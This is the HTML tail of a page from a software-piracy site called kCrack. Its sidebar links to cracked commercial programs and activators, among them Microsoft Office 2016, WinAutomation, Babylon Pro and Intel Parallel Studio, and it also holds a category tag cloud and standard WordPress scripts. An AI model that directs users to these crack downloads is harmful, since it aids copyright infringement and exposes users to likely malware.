class="widget-post-thumb col-lg-2 col-md-2 col-sm-3 col-xs-3 pl-0 pr-0"> <img width="150" height="150" src="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/06/WinAutomation-Professional-Plus-8-Crack.jpg?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="WinAutomation Professional Plus 8 Crack" data-attachment-id="624" data-permalink="https://kcrack.com/winautomation-professional-plus-crack/winautomation-professional-plus-8-crack/" data-orig-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/06/WinAutomation-Professional-Plus-8-Crack.jpg?fit=250%2C340&amp;ssl=1" data-orig-size="250,340" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="WinAutomation Professional Plus 8 Crack" data-image-description="" data-medium-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/06/WinAutomation-Professional-Plus-8-Crack.jpg?fit=221%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/06/WinAutomation-Professional-Plus-8-Crack.jpg?fit=250%2C340&amp;ssl=1" /> </div> <div class="widget-post-title col-lg-10 col-md-10 col-sm-9 col-xs-9 pr-0"> <a href="https://kcrack.com/winautomation-professional-plus-crack/"> WinAutomation Professional Plus 8.0.0.4886 With Crack </a> </div> </div> <div class="widget-random-post-title pt-10 row ml-0 mr-0 mb-10"> <div class="widget-post-thumb col-lg-2 col-md-2 col-sm-3 col-xs-3 pl-0 pr-0"> <img width="150" height="150" src="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/MAGIX-VariVerb-Crack-e1557656492111.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="MAGIX VariVerb Crack" data-attachment-id="3188" data-permalink="https://kcrack.com/magix-variverb-ii-crack/magix-variverb-crack/" data-orig-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/MAGIX-VariVerb-Crack-e1557656492111.png?fit=254%2C337&amp;ssl=1" data-orig-size="254,337" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="MAGIX VariVerb Crack" data-image-description="" data-medium-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/MAGIX-VariVerb-Crack-e1557656492111.png?fit=226%2C300&amp;ssl=1" data-large-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/MAGIX-VariVerb-Crack-e1557656492111.png?fit=254%2C337&amp;ssl=1" /> </div> <div class="widget-post-title col-lg-10 col-md-10 col-sm-9 col-xs-9 pr-0"> <a href="https://kcrack.com/magix-variverb-ii-crack/"> MAGIX VariVerb II 2.6.0 With Crack </a> </div> </div> <div class="widget-random-post-title pt-10 row ml-0 mr-0 mb-10"> <div class="widget-post-thumb col-lg-2 col-md-2 col-sm-3 col-xs-3 pl-0 pr-0"> <img width="150" height="150" src="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/02/Wondershare-Filmora-8-Crack-License-Key.jpg?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" data-attachment-id="59" data-permalink="https://kcrack.com/wondershare-filmora-crack/wondershare-filmora-8-crack-license-key/" data-orig-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/02/Wondershare-Filmora-8-Crack-License-Key.jpg?fit=299%2C430&amp;ssl=1" data-orig-size="299,430" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Wondershare-Filmora-8-Crack-License-Key" data-image-description="" data-medium-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/02/Wondershare-Filmora-8-Crack-License-Key.jpg?fit=209%2C300&amp;ssl=1" data-large-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/02/Wondershare-Filmora-8-Crack-License-Key.jpg?fit=299%2C430&amp;ssl=1" /> </div> <div class="widget-post-title col-lg-10 col-md-10 col-sm-9 col-xs-9 pr-0"> <a href="https://kcrack.com/wondershare-filmora-complete-effect-packs/"> Wondershare Filmora 8.0 Complete Effect Packs </a> </div> </div> <div class="widget-random-post-title pt-10 row ml-0 mr-0 mb-10"> <div class="widget-post-thumb col-lg-2 col-md-2 col-sm-3 col-xs-3 pl-0 pr-0"> <img width="150" height="150" src="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/11/Microsoft-Office-Professional-Plus-2016-Crack-Full-Version-e1541579450316.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Microsoft Office Professional Plus 2016 Crack Full Version" srcset="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/11/Microsoft-Office-Professional-Plus-2016-Crack-Full-Version-e1541579450316.png?resize=150%2C150&amp;ssl=1 150w, https://i1.wp.com/kcrack.com/wp-content/uploads/2018/11/Microsoft-Office-Professional-Plus-2016-Crack-Full-Version-e1541579450316.png?zoom=2&amp;resize=150%2C150&amp;ssl=1 300w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="1423" data-permalink="https://kcrack.com/microsoft-office-professional-plus-2016-crack/microsoft-office-professional-plus-2016-crack-full-version/" data-orig-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/11/Microsoft-Office-Professional-Plus-2016-Crack-Full-Version-e1541579450316.png?fit=347%2C565&amp;ssl=1" data-orig-size="347,565" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Microsoft Office Professional Plus 2016 Crack Full Version" data-image-description="" data-medium-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/11/Microsoft-Office-Professional-Plus-2016-Crack-Full-Version-e1541579450316.png?fit=184%2C300&amp;ssl=1" data-large-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/11/Microsoft-Office-Professional-Plus-2016-Crack-Full-Version-e1541579450316.png?fit=347%2C565&amp;ssl=1" /> </div> <div class="widget-post-title col-lg-10 col-md-10 col-sm-9 col-xs-9 pr-0"> <a href="https://kcrack.com/microsoft-office-professional-plus-2016-crack/"> Microsoft Office Professional Plus 2016 v16.0.4738.1000 + Activator (x86/x64) </a> </div> </div> <div class="widget-random-post-title pt-10 row ml-0 mr-0 mb-10"> <div class="widget-post-thumb col-lg-2 col-md-2 col-sm-3 col-xs-3 pl-0 pr-0"> <img width="150" height="150" src="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/12/Babylon-Pro-NG-full-crack.jpg?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Babylon Pro NG full crack" srcset="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/12/Babylon-Pro-NG-full-crack.jpg?w=472&amp;ssl=1 472w, https://i1.wp.com/kcrack.com/wp-content/uploads/2018/12/Babylon-Pro-NG-full-crack.jpg?resize=150%2C150&amp;ssl=1 150w, https://i1.wp.com/kcrack.com/wp-content/uploads/2018/12/Babylon-Pro-NG-full-crack.jpg?resize=298%2C300&amp;ssl=1 298w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="1589" data-permalink="https://kcrack.com/babylon-pro-ng-crack/babylon-pro-ng-full-crack/" data-orig-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/12/Babylon-Pro-NG-full-crack.jpg?fit=472%2C475&amp;ssl=1" data-orig-size="472,475" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Babylon Pro NG full crack" data-image-description="" data-medium-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/12/Babylon-Pro-NG-full-crack.jpg?fit=298%2C300&amp;ssl=1" data-large-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/12/Babylon-Pro-NG-full-crack.jpg?fit=472%2C475&amp;ssl=1" /> </div> <div class="widget-post-title col-lg-10 col-md-10 col-sm-9 col-xs-9 pr-0"> <a href="https://kcrack.com/babylon-pro-ng-crack/"> Babylon Pro NG 11.0.1 Full Crack + License Key </a> </div> </div> <div class="widget-random-post-title pt-10 row ml-0 mr-0 mb-10"> <div class="widget-post-thumb col-lg-2 col-md-2 col-sm-3 col-xs-3 pl-0 pr-0"> <img width="150" height="150" src="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/Intel-Parallel-Studio-XE-Cluster-Edition-Update-Crack.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Intel Parallel Studio XE Cluster Edition Update Crack" data-attachment-id="3151" data-permalink="https://kcrack.com/intel-parallel-studio-xe-cluster-edition-update-crack/intel-parallel-studio-xe-cluster-edition-update-crack/" data-orig-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/Intel-Parallel-Studio-XE-Cluster-Edition-Update-Crack.png?fit=200%2C252&amp;ssl=1" data-orig-size="200,252" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Intel Parallel Studio XE Cluster Edition Update Crack" data-image-description="" data-medium-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/Intel-Parallel-Studio-XE-Cluster-Edition-Update-Crack.png?fit=200%2C252&amp;ssl=1" data-large-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/Intel-Parallel-Studio-XE-Cluster-Edition-Update-Crack.png?fit=200%2C252&amp;ssl=1" /> </div> <div class="widget-post-title col-lg-10 col-md-10 col-sm-9 col-xs-9 pr-0"> <a href="https://kcrack.com/intel-parallel-studio-xe-cluster-edition-update-crack/"> Intel Parallel Studio XE Cluster Edition Update 4 2019 With Crack </a> </div> </div> <div class="widget-random-post-title pt-10 row ml-0 mr-0 mb-10"> <div class="widget-post-thumb col-lg-2 col-md-2 col-sm-3 col-xs-3 pl-0 pr-0"> <img width="150" height="150" src="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/12/3-Heights-PDF-Desktop-Repair-Tool-Full-Crack.jpg?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="3-Heights PDF Desktop Repair Tool Full Crack" srcset="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/12/3-Heights-PDF-Desktop-Repair-Tool-Full-Crack.jpg?w=220&amp;ssl=1 220w, https://i0.wp.com/kcrack.com/wp-content/uploads/2018/12/3-Heights-PDF-Desktop-Repair-Tool-Full-Crack.jpg?resize=150%2C150&amp;ssl=1 150w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="1776" data-permalink="https://kcrack.com/3-heights-pdf-desktop-repair-tool-crack/3-heights-pdf-desktop-repair-tool-full-crack/" data-orig-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/12/3-Heights-PDF-Desktop-Repair-Tool-Full-Crack.jpg?fit=220%2C220&amp;ssl=1" data-orig-size="220,220" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="3-Heights PDF Desktop Repair Tool Full Crack" data-image-description="" data-medium-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/12/3-Heights-PDF-Desktop-Repair-Tool-Full-Crack.jpg?fit=220%2C220&amp;ssl=1" data-large-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/12/3-Heights-PDF-Desktop-Repair-Tool-Full-Crack.jpg?fit=220%2C220&amp;ssl=1" /> </div> <div class="widget-post-title col-lg-10 col-md-10 col-sm-9 col-xs-9 pr-0"> <a href="https://kcrack.com/3-heights-pdf-desktop-repair-tool-crack/"> 3-Heights PDF Desktop Repair Tool 4.12.26.2 With Crack </a> </div> </div> <div class="widget-random-post-title pt-10 row ml-0 mr-0 mb-10"> <div class="widget-post-thumb col-lg-2 col-md-2 col-sm-3 col-xs-3 pl-0 pr-0"> <img width="150" height="150" src="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/10/Advanced-Installer-Architect-Crack.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Advanced Installer Architect Crack" srcset="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/10/Advanced-Installer-Architect-Crack.png?w=256&amp;ssl=1 256w, https://i2.wp.com/kcrack.com/wp-content/uploads/2018/10/Advanced-Installer-Architect-Crack.png?resize=150%2C150&amp;ssl=1 150w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="1413" data-permalink="https://kcrack.com/advanced-installer-architect-crack/advanced-installer-architect-crack/" data-orig-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/10/Advanced-Installer-Architect-Crack.png?fit=256%2C256&amp;ssl=1" data-orig-size="256,256" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Advanced Installer Architect Crack" data-image-description="" data-medium-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/10/Advanced-Installer-Architect-Crack.png?fit=256%2C256&amp;ssl=1" data-large-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/10/Advanced-Installer-Architect-Crack.png?fit=256%2C256&amp;ssl=1" /> </div> <div class="widget-post-title col-lg-10 col-md-10 col-sm-9 col-xs-9 pr-0"> <a href="https://kcrack.com/advanced-installer-architect-crack/"> Advanced Installer Architect 15.4 With Crack </a> </div> </div> </div> </div> <section id="tag_cloud-2" class="widget widget_tag_cloud"><h2 class="widget-title">Categories</h2><div class="tagcloud"><a href="https://kcrack.com/category/activator/" class="tag-cloud-link tag-link-254 tag-link-position-1" style="font-size: 13pt;" aria-label="Activator (9 items)">Activator</a> <a href="https://kcrack.com/category/adobe/" class="tag-cloud-link tag-link-1151 tag-link-position-2" style="font-size: 12.6428571429pt;" aria-label="Adobe (8 items)">Adobe</a> <a href="https://kcrack.com/category/android/" class="tag-cloud-link tag-link-3887 tag-link-position-3" style="font-size: 8pt;" aria-label="Android (1 item)">Android</a> <a href="https://kcrack.com/category/antivirus/" class="tag-cloud-link tag-link-253 tag-link-position-4" style="font-size: 13.7857142857pt;" aria-label="Antivirus (12 items)">Antivirus</a> <a href="https://kcrack.com/category/converters/audio-converters/" class="tag-cloud-link tag-link-3883 tag-link-position-5" style="font-size: 11.4285714286pt;" aria-label="Audio Converters (5 items)">Audio Converters</a> <a href="https://kcrack.com/category/multimedia/audio-editing-software/" class="tag-cloud-link tag-link-157 tag-link-position-6" style="font-size: 12.6428571429pt;" aria-label="Audio Editing Software (8 items)">Audio Editing Software</a> <a href="https://kcrack.com/category/backup-recovery-tools/" class="tag-cloud-link tag-link-657 tag-link-position-7" style="font-size: 16.6428571429pt;" aria-label="Backup &amp; Recovery Tools (31 items)">Backup &amp; Recovery Tools</a> <a href="https://kcrack.com/category/converters/" class="tag-cloud-link tag-link-49 tag-link-position-8" style="font-size: 16.2142857143pt;" aria-label="Converters (27 items)">Converters</a> <a href="https://kcrack.com/category/developer-tools/" class="tag-cloud-link tag-link-3549 tag-link-position-9" style="font-size: 12.2857142857pt;" aria-label="Developer Tools (7 items)">Developer Tools</a> <a href="https://kcrack.com/category/converters/document-converters/" class="tag-cloud-link tag-link-507 tag-link-position-10" style="font-size: 14.2857142857pt;" aria-label="Document Converters (14 items)">Document Converters</a> <a href="https://kcrack.com/category/document-tools/" class="tag-cloud-link tag-link-508 tag-link-position-11" style="font-size: 15.4285714286pt;" aria-label="Document Tools (21 items)">Document Tools</a> <a href="https://kcrack.com/category/download-manager/" class="tag-cloud-link tag-link-6 tag-link-position-12" style="font-size: 13.5714285714pt;" aria-label="Download Manager (11 items)">Download Manager</a> <a href="https://kcrack.com/category/converters/dvd-ripper-converter/" class="tag-cloud-link tag-link-2628 tag-link-position-13" style="font-size: 10.8571428571pt;" aria-label="DVD Ripper &amp; Converter (4 items)">DVD Ripper &amp; Converter</a> <a href="https://kcrack.com/category/dvd-tools/" class="tag-cloud-link tag-link-398 tag-link-position-14" style="font-size: 12.6428571429pt;" aria-label="DVD Tools (8 items)">DVD Tools</a> <a href="https://kcrack.com/category/featured-software/" class="tag-cloud-link tag-link-85 tag-link-position-15" style="font-size: 20.1428571429pt;" aria-label="Featured Software (100 items)">Featured Software</a> <a href="https://kcrack.com/category/graphic-apps/" class="tag-cloud-link tag-link-362 tag-link-position-16" style="font-size: 16.5pt;" aria-label="Graphic Apps (30 items)">Graphic Apps</a> <a href="https://kcrack.com/category/hide-ip-address/" class="tag-cloud-link tag-link-2867 tag-link-position-17" style="font-size: 9.28571428571pt;" aria-label="Hide IP Address (2 items)">Hide IP Address</a> <a href="https://kcrack.com/category/internet-tools/" class="tag-cloud-link tag-link-3530 tag-link-position-18" style="font-size: 12.6428571429pt;" aria-label="Internet Tools (8 items)">Internet Tools</a> <a href="https://kcrack.com/category/ios-tools/" class="tag-cloud-link tag-link-3548 tag-link-position-19" style="font-size: 9.28571428571pt;" aria-label="iOS Tools (2 items)">iOS Tools</a> <a href="https://kcrack.com/category/multimedia/" class="tag-cloud-link tag-link-30 tag-link-position-20" style="font-size: 20.3571428571pt;" aria-label="Multimedia (106 items)">Multimedia</a> <a href="https://kcrack.com/category/office/" class="tag-cloud-link tag-link-509 tag-link-position-21" style="font-size: 16.8571428571pt;" aria-label="Office (34 items)">Office</a> <a href="https://kcrack.com/category/pc-laptop-drivers/" class="tag-cloud-link tag-link-105 tag-link-position-22" style="font-size: 11.9285714286pt;" aria-label="PC &amp; Laptop Drivers (6 items)">PC &amp; Laptop Drivers</a> <a href="https://kcrack.com/category/software/" class="tag-cloud-link tag-link-5 tag-link-position-23" style="font-size: 22pt;" aria-label="PC Software (183 items)">PC Software</a> <a href="https://kcrack.com/category/photo-apps/" class="tag-cloud-link tag-link-3886 tag-link-position-24" style="font-size: 8pt;" aria-label="Photo Apps (1 item)">Photo Apps</a> <a href="https://kcrack.com/category/multimedia/photo-editing-software/" class="tag-cloud-link tag-link-363 tag-link-position-25" style="font-size: 17.7857142857pt;" aria-label="Photo Editing Software (46 items)">Photo Editing Software</a> <a href="https://kcrack.com/category/photoshop-plugins/" class="tag-cloud-link tag-link-639 tag-link-position-26" style="font-size: 11.4285714286pt;" aria-label="Photoshop Plugins (5 items)">Photoshop Plugins</a> <a href="https://kcrack.com/category/systemcare/security-tools/" class="tag-cloud-link tag-link-199 tag-link-position-27" style="font-size: 15.1428571429pt;" aria-label="Security Tools (19 items)">Security Tools</a> <a href="https://kcrack.com/category/systemcare/" class="tag-cloud-link tag-link-86 tag-link-position-28" style="font-size: 16.6428571429pt;" aria-label="SystemCare (31 items)">SystemCare</a> <a href="https://kcrack.com/category/uncategorized/" class="tag-cloud-link tag-link-1 tag-link-position-29" style="font-size: 11.9285714286pt;" aria-label="Uncategorized (6 items)">Uncategorized</a> <a href="https://kcrack.com/category/systemcare/utility-tools/" class="tag-cloud-link tag-link-87 tag-link-position-30" style="font-size: 18.7857142857pt;" aria-label="Utility Tools (63 items)">Utility Tools</a> <a href="https://kcrack.com/category/converters/video-converters/" class="tag-cloud-link tag-link-50 tag-link-position-31" style="font-size: 14.4285714286pt;" aria-label="Video Converters (15 items)">Video Converters</a> <a href="https://kcrack.com/category/multimedia/video-editing-software/" class="tag-cloud-link tag-link-31 tag-link-position-32" style="font-size: 18pt;" aria-label="Video Editing Software (49 items)">Video Editing Software</a> <a href="https://kcrack.com/category/windows-software/" class="tag-cloud-link tag-link-200 tag-link-position-33" style="font-size: 16.8571428571pt;" aria-label="Windows Software (34 items)">Windows Software</a></div> </section></aside> </div> </div> </div> <div class="footer-copyright row ml-0 mr-0 mt-10"> <p>Copyright &copy; 2018 www.kCrack.com,</p> </div> <footer id="colophon" class="site-footer"> <div class="footer-links pull-left"> <div class="menu-footer-menu-container"><ul id="footer-menu" class="menu"><li id="menu-item-38" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-38"><a href="https://kcrack.com/" aria-current="page">Home</a></li> <li id="menu-item-34" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-34"><a href="https://kcrack.com/privacy-policy/">Privacy Policy</a></li> <li id="menu-item-35" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-35"><a href="https://kcrack.com/dmca/">DMCA Policy</a></li> <li id="menu-item-36" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-36"><a href="https://kcrack.com/contact/">Contact</a></li> <li id="menu-item-37" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-37"><a href="https://kcrack.com/about/">About</a></li> <li id="menu-item-33" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-33"><a href="https://kcrack.com/donate/">Donate</a></li> </ul></div> </div> <div class="footer-donation-btn pull-right"> <a href="https://kcrack.com/donate/"><i class="fa fa-heart"></i> kCrack</a> </div> </footer> </div> <div style="display:none"> </div> <link rel='stylesheet' id='genericons-css' href='https://c0.wp.com/p/jetpack/7.3/_inc/genericons/genericons/genericons.css' type='text/css' media='all' /> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3/_inc/build/photon/photon.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/kcrack.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://kcrack.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript' src='https://kcrack.com/wp-content/plugins/smooth-scroll-up/js/jquery.scrollUp.min.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var ratingsL10n = {"plugin_url":"https:\/\/kcrack.com\/wp-content\/plugins\/wp-postratings","ajax_url":"https:\/\/kcrack.com\/wp-admin\/admin-ajax.php","text_wait":"Please rate only 1 item at a time.","image":"stars_crystal","image_ext":"gif","max":"5","show_loading":"1","show_fading":"1","custom":"0"}; var ratings_mouseover_image=new Image();ratings_mouseover_image.src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_over.gif";; /* ]]> */ </script> <script type='text/javascript' src='https://kcrack.com/wp-content/plugins/wp-postratings/js/postratings-js.js?ver=1.86.2'></script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Mayaa'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3/modules/wpgroho.js'></script> <script type='text/javascript' src='https://kcrack.com/wp-content/themes/getinmac/bootstrap/js/bootstrap.min.js?ver=5.2'></script> <script type='text/javascript' src='https://kcrack.com/wp-content/themes/getinmac/js/navigation.js?ver=5.2'></script> <script type='text/javascript' src='https://kcrack.com/wp-content/themes/getinmac/js/jquery.matchHeight.js?ver=5.2'></script> <script type='text/javascript' src='https://kcrack.com/wp-content/themes/getinmac/js/js-functions.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var jpfbembed = {"appid":"249643311490","locale":"en_US"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3/_inc/build/facebook-embed.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/wp-embed.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3/_inc/build/spin.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3/_inc/build/jquery.spin.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/kcrack.com\/wp-admin\/admin-ajax.php","nonce":"7e699949d3","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/kcrack.com\/wp-login.php?redirect_to=https%3A%2F%2Fkcrack.com%2Fidm-crack%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3/_inc/build/carousel/jetpack-carousel.min.js'></script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3',blog:'142211733',post:'0',tz:'0',srv:'kcrack.com'} ]); _stq.push([ 'clickTrackerInit', '142211733', '0' ]); </script> </body> </html>
0
